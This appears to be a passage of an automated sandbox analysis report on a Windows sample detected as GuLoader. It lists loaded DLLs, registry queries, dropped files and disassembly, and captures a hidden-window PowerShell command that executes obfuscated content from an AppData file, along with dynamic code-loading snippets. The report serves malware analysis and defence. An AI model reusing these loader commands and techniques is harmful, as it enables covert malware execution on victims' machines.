Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ln5S7fIBkY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb$ source: powershell.exe, 00000002.00000002.2352305297.0000000008D6D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Overmortgaging $Ventileringens $signis), (Pessimistens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Foresprgselen = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($underldighederne)), $Stupendous1).DefineDynamicModule($lobed, $false).DefineType($Larkishly, $Terminalization72, [System.MulticastDele

Suspicious powershell command line found

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E37DE7 push eax; iretd	2_2_07E37DE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E37DF2 push eax; iretd	2_2_07E37DF3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E39145 push ebp; iretd	2_2_07E39146
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3834C pushad ; iretd	2_2_07E38356
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3835E pushad ; iretd	2_2_07E3835F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E37B2A push eax; iretd	2_2_07E37B2B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E30D0F push eax; iretd	2_2_07E30D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E30D1A push eax; iretd	2_2_07E30D1B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E37B1F push eax; iretd	2_2_07E37B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3B6E6 pushad ; iretd	2_2_07E3B6F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3B6F8 pushad ; iretd	2_2_07E3B6F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E312C1 push eax; iretd	2_2_07E312C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3AEC6 pushad ; iretd	2_2_07E3AED0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3AED8 pushad ; iretd	2_2_07E3AED9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E312B6 push eax; iretd	2_2_07E312B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E33005 push eax; iretd	2_2_07E33006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E33010 push eax; iretd	2_2_07E33011
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09714173 pushad ; iretd	2_2_09714174
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09711B7A push eax; iretd	2_2_09711B7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09714161 pushad ; iretd	2_2_0971416B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09711B6F push eax; iretd	2_2_09711B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0971274E pushad ; iretd	2_2_0971274F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0971273C pushad ; iretd	2_2_09712746
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0971371C push eax; iretd	2_2_0971371D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_097111E1 push 8BD68B50h; iretd	2_2_097111E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_097103C1 push 8BD68B50h; retf	2_2_097103C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_097143C3 pushad ; iretd	2_2_097143C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_097143B1 pushad ; iretd	2_2_097143BB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_097101A7 push eax; iretd	2_2_097101A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0971019C push eax; iretd	2_2_0971019D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0971105B pushad ; iretd	2_2_0971105C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
